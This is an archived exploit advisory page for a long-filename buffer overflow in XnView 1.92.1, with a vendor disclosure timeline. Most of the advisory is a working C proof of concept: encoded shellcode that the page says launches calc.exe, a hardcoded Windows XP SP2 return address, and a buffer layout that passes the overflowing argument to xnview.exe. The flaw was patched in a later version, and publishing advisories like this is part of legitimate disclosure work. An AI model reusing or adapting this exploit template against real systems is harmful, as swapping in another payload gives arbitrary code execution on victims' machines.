exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xnview-overflow.txt

xnview-overflow.txt
Posted Mar 17, 2008
Authored by Sylvain THUAL | Site click-internet.fr

XNview version 1.92.1 suffers from a long filename overflow vulnerability.

tags | exploit, overflow
SHA-256 | 7b8a6ad02f41fefeecc8fd3eca8752372fa7974dda692e938ae56ed8db055fa2
Download | Favorite | View

xnview-overflow.txt

Change Mirror Download
--------
*XNview*
--------

Informations :
************** 
Version : 1.92.1
Website : http://www.xnview.com/
Problem : Long Filename Overflow


Description:
************
XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and 

more).

Details :
*********
The problem is that XNview doesn't handle long file names.It result in an exploitable buffer overflow which allow execution of arbitrary code.

POC:
****
#include <windows.h>
#include <unistd.h>  

/*
Shellcode
Size=164 octets
Action: open calc.exe
*/
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16"
"\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1"
"\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd"
"\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99"
"\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2"
"\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0"
"\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f"
"\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc"
"\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90"
"\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec"
"\x73\x77\x0b\x94";

/*
user32.dll ret adress ==> jmp ebp
under Win XP pro SP2
*/
unsigned char ret[] ="\x34\x59\x40\x7e";


int main(int argc,char *argv[]){
char *bufExe[3];
char buf[511];
bufExe[0] = "xnview.exe";
bufExe[2] = NULL;
memset(buf,0x90,511);
memcpy(&buf[260],ret,4);   
memcpy(&buf[330],shellcode,sizeof(shellcode));   
bufExe[1] = buf;
  
execve(bufExe[0],bufExe,NULL);
return 0x0;
}

Disclosure Timeline:
********************
04 February 2008 - Discovery
12 February 2008 - Vendor notification
13 February 2008 - Vendor reply
14 March    2008 - Release of XNview 1.93.1
15 March    2008 - Public Disclosure

Credits:
********
Author : Sylvain THUAL
Original advisory(French) : http://www.click-internet.fr/index.php?cki=News&news=9 
E-mail : contact@click-internet.fr
Website : http://www.click-internet.fr

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close